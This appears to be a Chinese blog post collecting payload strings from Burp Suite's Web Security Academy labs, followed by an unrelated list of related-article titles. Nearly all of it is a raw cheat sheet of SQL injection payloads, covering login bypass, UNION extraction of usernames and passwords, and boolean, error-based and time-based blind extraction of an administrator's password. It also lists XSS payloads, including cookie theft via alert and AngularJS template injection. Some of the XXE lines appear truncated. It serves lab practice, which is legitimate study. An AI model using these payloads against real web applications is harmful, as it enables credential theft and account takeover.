• 整理的burp官网的漏洞语句

    一、SQL注入

    where从句
    '+OR+1=1--
    登录绕过
    administrator'--
    union从句
    '+UNION+SELECT+NULL--
    '+UNION+SELECT+NULL,NULL--
    '+UNION+SELECT+'abcdef',NULL,NULL--
    '+UNION+SELECT+'abc','def'--
    '+UNION+SELECT+username,+password+FROM+users--
    '+UNION+SELECT+NULL,'abc'--
    '+UNION+SELECT+NULL,username||'~'||password+FROM+users--
    查询数据库类型
    '+UNION+SELECT+'abc','def'+FROM+dual--
    '+UNION+SELECT+BANNER,+NULL+FROM+v$version--
    '+UNION+SELECT+'abc','def'#
    '+UNION+SELECT+@@version,+NULL#
    列出数据库内容
    '+UNION+SELECT+'abc','def'--
    '+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--
    '+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_abcdef'--
    '+UNION+SELECT+username_abcdef,+password_abcdef+FROM+users_abcdef--
    盲注
    TrackingId=xyz' AND '1'='1
    TrackingId=xyz' AND '1'='2
    TrackingId=xyz' AND (SELECT 'a' FROM users LIMIT 1)='a
    TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator')='a
    TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>1)='a
    TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>2)='a
    TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>3)='a
    TrackingId=xyz' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='a
    TrackingId=xyz' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='§a§
    TrackingId=xyz' AND (SELECT SUBSTRING(password,2,1) FROM users WHERE username='administrator')='a

    TrackingId=xyz'
    TrackingId=xyz''
    TrackingId=xyz'||(SELECT '')||'
    TrackingId=xyz'||(SELECT '' FROM dual)||'
    TrackingId=xyz'||(SELECT '' FROM not-a-real-table)||'
    TrackingId=xyz'||(SELECT '' FROM users WHERE ROWNUM = 1)||'
    TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
    TrackingId=xyz'||(SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
    TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>1 THEN to_char(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>2 THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>3 THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,1,1)='a' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,1,1)='§a§' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,2,1)='§a§' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    时间盲注
    TrackingId=x'||pg_sleep(10)--
    TrackingId=x'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
    TrackingId=x'%3BSELECT+CASE+WHEN+(1=2)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>2)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>3)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,1,1)='a')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,1,1)='§a§')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,2,1)='§a§')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f>+%25remote%3b]>'),'/l')+FROM+dual--
    TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f>+%25remote%3b]>'),'/l')+FROM+dual--

    二、xss

    ">

    javascript:alert(document.cookie)

    "οnmοuseοver="alert(1)

    '-alert(1)-'

    product?productId=1&storeId=">

    {{$on.constructor('alert(1)')()}}

    \'-alert(1)//

    ${alert(1)}

  • 相关阅读:
    可能是2022最详细的【Java SE 】顺序结构、分支结构、循环结构讲解
    Vue中的计算属性和方法有什么区别?
    【Unity3D】VideoPlayer组件
    滤波算法_标准卡尔曼滤波(SKF, Standard Kalman filter)_①基础铺垫
    【技术美术图形部分】坐标空间和MVP变换
    技术委员会主席杨勇:下一代操作系统展望|2022云栖龙蜥实录
    div+css布局实现个人网页设计(HTML期末作业)
    Android Native崩溃信息分析和 工具(addr2line和ndkstack)使用
    Sumo中Traci.trafficlight详解(上)
    八股文随笔3
  • 原文地址:https://blog.csdn.net/tainqiuer123/article/details/125887065